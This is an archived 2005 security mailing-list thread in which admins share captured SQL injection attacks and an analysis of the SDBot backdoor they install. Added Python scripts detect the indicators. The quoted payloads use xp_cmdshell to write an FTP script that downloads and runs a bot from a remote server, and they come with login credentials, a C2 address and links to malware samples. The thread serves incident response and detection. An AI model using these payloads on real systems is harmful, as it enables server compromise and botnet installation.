Full Disclosure mailing list archives

FW: Re: [Dshield] SQL injection worm ?


From: "Tim Myers" <tmyers () coactivesys com>
Date: Wed, 19 Jan 2005 16:24:58 -0500


Maxime,

Here is the information I've gathered on lol.exe. Hope this helps you out or anyone else that has this worm. Let me 
know if you need anything else. 

Tim Myers


FILE INFORMATION:
The file consists of SDBot, which is a Win32 backdoor.
Packed/encrypted with Morphine 1.2.
The trojan connects to the IRC server 170.211.69.66:6667, where it waits for commands.
Drops msgfix.exe into the \windows\system32 directory and adds itself to startup via HKLM\..\..\run.

IP INFORMATION:
        [170.211.69.66]
OrgName:    Arkansas Public School Computer Network 
OrgID:      APSCN
Address:    #4 State Capitol Mall, Room 401A
City:       Little Rock
StateProv:  AR
PostalCode: 72201-1071
Country:    US

NetRange:   170.211.0.0 - 170.211.255.255 
CIDR:       170.211.0.0/16 
NetName:    APSCN-1
NetHandle:  NET-170-211-0-0-1
Parent:     NET-170-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS3.STATE.AR.US
NameServer: DNS1.STATE.AR.US
Comment:    
RegDate:    1995-01-30
Updated:    2000-02-08

TechHandle: ZS25-ARIN
TechName:   State of Arkansas 
TechPhone:  +1-501-682-0500
TechEmail:  hostmaster () dcs state ar us 



SDBOT INFORMATION:
Backdoor.Sdbot is a server component (bot) that the Trojan's creator distributes over IRC channels. This Trojan horse 
allows its creator to perform a wide variety of actions on a compromised computer.

The Trojan arrives in the form of a Portable Executable (PE) file. 

When Backdoor.Sdbot is executed, it does the following:


Copies itself to the %System% folder. The file name to which it copies itself can vary. Some known file names are: 
Cnfgldr.exe
cthelp.exe
Sysmon16.exe
Sys3f2.exe
Syscfg32.exe
Mssql.exe
Aim95.exe
Svchosts.exe
FB_PNU.EXE
Cmd32.exe
Sys32.exe
Explorer.exe
IEXPL0RE.EXE
iexplore.exe
sock32.exe
MSTasks.exe
service.exe
Regrun.exe
ipcl32.exe
syswin32.exe
CMagesta.exe
YahooMsgr.exe
vcvw.exe
spooler.exe
MSsrvs32.exe
svhost.exe
winupdate32.exe
quicktimeprom.exe


NOTE: %System% is a variable. The Trojan locates the \Windows\System folder (by default, this is C:\Windows\System or 
C:\Winnt\System32), and then copies itself to that location. 


Adds one of the following values:

"Configuration Manager"="Cnfgldr.exe"
"System Monitor"="Sysmon16.exe"
"MSSQL"="Mssql.exe"
"Configuration Loader" = "aim95.exe"
"Internet Config" = "svchosts.exe"
"System33" = "%System%\FB_PNU.EXE"
"Configuration Loader"="cmd32.exe"
"Windows Explorer"="Explorer.exe"
"Configuration Loader"="IEXPL0RE.EXE"
"Configuration Loader"="%System%\iexplore.exe"
"Sock32"="sock32.exe"
"Configuration Loader"="MSTasks.exe"
"Windows Services"="service.exe"
"Registry Checker" = "%System%\Regrun.exe"
"Internet Protocol Configuration Loader" = "ipcl32.exe"
"syswin32" = "syswin32.exe"
"MachineTest" = "CMagesta.exe"
"Yahoo Instant Messenger" = "Yahoo Instant Messenger"
"Fixnice" = "vcvw.exe"
"Windows Configuration" = "spooler.exe"
"Microsoft Video Capture Controls" = "MSsrvs32.exe"
"Microsoft Synchronization Manager" = "svhost.exe"
"Microsoft Synchronization Manager" = "winupdate32.exe"
"Quick Time file manager" = "quicktimeprom.exe"
"cthelp"="cthelp.exe"

or a similar value to the following registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Backdoor.Sdbot contains its own IRC client, allowing it to connect to an IRC channel that was coded into the Trojan. 
Using the IRC channel, the Trojan listens for the commands from the Trojan's creator. The creator of the Trojan 
accesses the Trojan by using a password-protected authorization. 

The commands allow the Trojan's creator to perform any of the following actions: 
Manage the Backdoor installation. 
Control the IRC client on a compromised computer. 
Dynamically update the installed Trojan. 
Send the Trojan to other IRC channels to attempt to compromise more computers. 
Download and execute files. 
Deliver system and network information to the Trojan's creator. 
Perform Denial of Service (DoS) attacks against a target, which the Trojan's creator defines. 
Completely uninstall itself by removing the relevant registry entries.
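
To turn the Run-key value names and file names listed above into a check an administrator can actually run, here is an added Python example; it is my code, not part of Tim's post or of the Sdbot write-up he quotes. It parses the text that `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` prints on Windows 2000/XP (value name, type and data separated by runs of spaces), matches each entry against the two indicator lists, and grades the match by where the image lives, so a legitimate program that merely shares a file name with one on the list (iexplore.exe under Program Files) is reported at low confidence rather than as an infection. The sample `reg query` output is constructed, and the `msgfix.exe` entry stands in for the drop named in the file information section.

```python
import re
from typing import Dict, List, Tuple

# Value names and file names from the Sdbot list above, plus msgfix.exe from
# the file information section. Lowercased so the comparison is case-blind.
SDBOT_VALUE_NAMES = {
    "configuration manager", "system monitor", "mssql", "configuration loader",
    "internet config", "system33", "windows explorer", "sock32",
    "windows services", "registry checker",
    "internet protocol configuration loader", "syswin32", "machinetest",
    "yahoo instant messenger", "fixnice", "windows configuration",
    "microsoft video capture controls", "microsoft synchronization manager",
    "quick time file manager", "cthelp",
}
SDBOT_FILE_NAMES = {
    "cnfgldr.exe", "cthelp.exe", "sysmon16.exe", "sys3f2.exe", "syscfg32.exe",
    "mssql.exe", "aim95.exe", "svchosts.exe", "fb_pnu.exe", "cmd32.exe",
    "sys32.exe", "explorer.exe", "iexpl0re.exe", "iexplore.exe", "sock32.exe",
    "mstasks.exe", "service.exe", "regrun.exe", "ipcl32.exe", "syswin32.exe",
    "cmagesta.exe", "yahoomsgr.exe", "vcvw.exe", "spooler.exe", "mssrvs32.exe",
    "svhost.exe", "winupdate32.exe", "quicktimeprom.exe", "msgfix.exe",
}

# One data line of `reg query` output: indented name, type, data, separated
# by runs of at least two spaces (value names themselves may contain one).
REG_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")

# Directory fragments matching where Sdbot drops itself (%System% per the
# write-up). An empty directory means a bare file name that Windows resolves
# through the search path, which also lands in System32.
SYSTEM_DIR_HINTS = ("%system%", "%systemroot%", "\\windows\\system",
                    "\\winnt\\system", "\\system32")


def parse_reg_query(text: str) -> List[Dict[str, str]]:
    """Turn saved `reg query` output into a list of name/type/data records."""
    entries = []
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            entries.append({"name": m["name"], "type": m["type"], "data": m["data"].strip()})
    return entries


def split_image(data: str) -> Tuple[str, str]:
    """Return (directory, basename) of the executable named in a Run value.

    Handles a quoted path with trailing arguments and an unquoted path whose
    first space ends the command; both parts are lowercased for comparison.
    """
    cmd = data.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        cmd = cmd[1:end] if end > 0 else cmd[1:]
    else:
        cmd = cmd.split(" ")[0]
    directory, _, base = cmd.replace("/", "\\").rpartition("\\")
    return directory.lower(), base.lower()


def looks_like_system_dir(directory: str) -> bool:
    return directory == "" or any(h in directory for h in SYSTEM_DIR_HINTS)


def assess_run_entries(text: str) -> List[Dict[str, str]]:
    """Return one finding per Run entry that matches an Sdbot indicator.

    Confidence: high when both the value name and the file name are on the
    list and the file sits in a system location; medium when one of them
    matches in a system location; low when only a name matches but the file
    lives elsewhere (most likely a legitimate program sharing the name).
    """
    findings = []
    for e in parse_reg_query(text):
        directory, base = split_image(e["data"])
        name_hit = e["name"].lower() in SDBOT_VALUE_NAMES
        file_hit = base in SDBOT_FILE_NAMES
        if not (name_hit or file_hit):
            continue
        if looks_like_system_dir(directory):
            confidence = "high" if (name_hit and file_hit) else "medium"
        else:
            confidence = "low"
        findings.append({"name": e["name"], "data": e["data"], "confidence": confidence})
    return findings


# Constructed sample: what `reg query HKLM\...\Run` prints on an XP host with
# one benign entry, two entries in the style described above, and a name
# collision with a legitimately installed iexplore.exe.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    ExampleUpdater    REG_SZ    "C:\Program Files\Example\updater.exe" /background
    Configuration Loader    REG_SZ    cmd32.exe
    msgfix    REG_SZ    C:\WINDOWS\system32\msgfix.exe
    Internet Explorer    REG_SZ    "C:\Program Files\Internet Explorer\iexplore.exe" -k
"""

if __name__ == "__main__":
    for f in assess_run_entries(SAMPLE_REG_QUERY):
        print(f"[{f['confidence']:6}] {f['name']!r} -> {f['data']}")
```

Run it over the saved output of `reg query` for each of the three keys listed below (Run, RunServices and the HKCU Run key); a high or medium finding is the file to pull for inspection, and the bare-filename case is worth a second look even when the name is not on the list, since the bot variants above differ only in the names they pick.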
-----Original Message-----
From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of 
Maxime Ducharme
Sent: Wednesday, January 19, 2005 2:13 PM
To: full-disclosure () lists netsys com; General DShield Discussion List; incidents () securityfocus com
Subject: [Full-disclosure] Re: [Dshield] SQL injection worm ?


Hi to the List

today we received the same SQL injection attack on the same URL:

IP: 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent: none sent
HTTP Verb: GET /theasppage.asp?anID=
Attack:
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection:
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 Jan. doesn't find anything suspicious.

I'm interested if someone does an analysis of this file.

Have a nice day

Maxime Ducharme
Programmer / Network Security Specialist


----- Original Message -----
From: "Maxime Ducharme" <mducharme () cybergeneration com>
To: <full-disclosure () lists netsys com>; "General DShield Discussion List"
<list () lists dshield org>; <incidents () securityfocus com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?



Hi list,
    we received a particular SQL injection attack on one of our sites.

Attack looks like:
2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET 
/Nouvelles.asp
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 
attacked.web.site.com - - -

HTTP request contains only 2 fields (besides the HTTP method):
Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site).

Decoded SQL injection looks like:
exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> 
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe 
%systemroot%\system32\Macromed\lolx\arcdlrde.exe >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe

y.y.y.y is a foreign IP in Europe which hosts an FTP and a WWW server.
I sent a notice to this site's sysadmin about the situation.

I have been able to connect to this FTP with the account 
hahajk/hahaowned (which does not seem legit to me ...) and download suspicious files.
I mirrored them here :
http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks, they have also been advised.

I know rbot.exe is known to be the Randex worm, but I'd like to have 
some other results / analysis.

I also found a "test.asp" file which contains the Spybot worm.

Weird thing is, I searched for this host's activity on every server 
and every firewall we run, and I only see 1 TCP connection, which is 
the prepared SQL injection attack, nothing else.

Anybody see similar activity?

I'm asking since I want to know if we are targeted by someone, or by a 
worm like Santy that uses search engines to find vulnerable ASP scripts.

Thanks in advance

Happy new year to everyone !

Maxime Ducharme
Programmer / Network Security Specialist
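
Both payloads in this thread hex-encode every letter of `exec MASTER..xp_cmdshell`, so grepping the IIS log for the literal `xp_cmdshell` misses them, while the decoded text shows it plainly. The following Python is an added example, not code from Maxime's post: it pulls the cs-uri-query field out of W3C log lines laid out like the one above, percent-decodes it once, normalises whitespace and case, and reports which indicators matched (the stored-procedure name, the `MASTER..` prefix, a stacked `;exec`, the `ftp.exe -s:` script download and the `'--` comment terminator). The sample log lines are constructed; the addresses are documentation placeholders and the encoded payload is a shortened copy of the pattern quoted above with the FTP server details and credentials removed.

```python
import re
from urllib.parse import unquote

# Indicators drawn from the payload quoted in the thread. The regexes are my
# generalisation of it (e.g. optional whitespace around "..", any -x flags
# before -s:), not something the original post spells out.
INDICATORS = {
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "master_prefix": re.compile(r"master\s*\.\.\s*xp_", re.I),
    "stacked_exec": re.compile(r";\s*exec\s", re.I),
    "ftp_script": re.compile(r"ftp(\.exe)?\s+(-\w\s+)*-s:", re.I),
    "comment_terminator": re.compile(r"'\s*--\s*$"),
}


def decode_query(raw: str) -> str:
    """Percent-decode a query string once and normalise it for matching.

    A single pass is deliberate: '%25systemroot%25' becomes '%systemroot%',
    which is exactly the literal the attacker wanted cmd.exe to see, and it
    is what the log analyst should read too. Whitespace runs are collapsed
    so '%20%20' padding cannot split a keyword.
    """
    decoded = unquote(raw)
    return re.sub(r"\s+", " ", decoded).strip()


def scan_line(line: str) -> dict:
    """Scan one IIS W3C log line and return client, decoded query and hits.

    Field layout as in the thread's sample: date time c-ip cs-username
    s-sitename s-computername s-ip s-port cs-method cs-uri-stem
    cs-uri-query ... (spaces inside the query are always %20-encoded, so a
    plain split is safe). An empty 'hits' list means nothing matched.
    """
    fields = line.split()
    client = fields[2] if len(fields) > 2 else ""
    query = fields[10] if len(fields) > 10 else ""
    decoded = decode_query(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"client": client, "decoded": decoded, "hits": hits}


def suspicious_clients(lines) -> set:
    """Return the set of client IPs whose requests hit at least one indicator."""
    return {r["client"] for r in map(scan_line, lines) if r["hits"]}


# Constructed sample lines: a benign request, one encoded like the thread's
# payload (shortened, placeholder paths), and the same thing in plain text.
SAMPLE_LOG = [
    "2005-01-05 14:30:00 10.0.0.5 - W3SVC1 SRV 192.0.2.10 80 GET /Nouvelles.asp "
    "id_nouvelle=377 200 0 0 512 300 HTTP/1.1 www.example.test - - -",
    "2005-01-05 14:39:20 198.51.100.7 - W3SVC1 SRV 192.0.2.10 80 GET /Nouvelles.asp "
    "id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20"
    "'mkdir%20%25systemroot%25%5Ctemp%5C';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64"
    "%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroot%25%5Ctemp%5Cx.jkd'-- "
    "500 0 0 1395 570 HTTP/1.1 www.example.test - - -",
    "2005-01-05 14:40:01 198.51.100.7 - W3SVC1 SRV 192.0.2.10 80 GET /page.asp "
    "anID=1';exec%20master..xp_cmdshell%20'dir'-- 500 0 0 800 300 HTTP/1.1 www.example.test - - -",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        result = scan_line(line)
        flag = "ALERT" if result["hits"] else "ok   "
        print(f"{flag} {result['client']:15} {','.join(result['hits']) or '-'}")
        if result["hits"]:
            print("      decoded:", result["decoded"][:120])
```

Note that the 500 status and the ODBC "Incorrect syntax" error in the original line are what made the attempt visible at all; the same decoder would have flagged a request that succeeded silently, which is why the query text rather than the status code should drive the alert.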





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



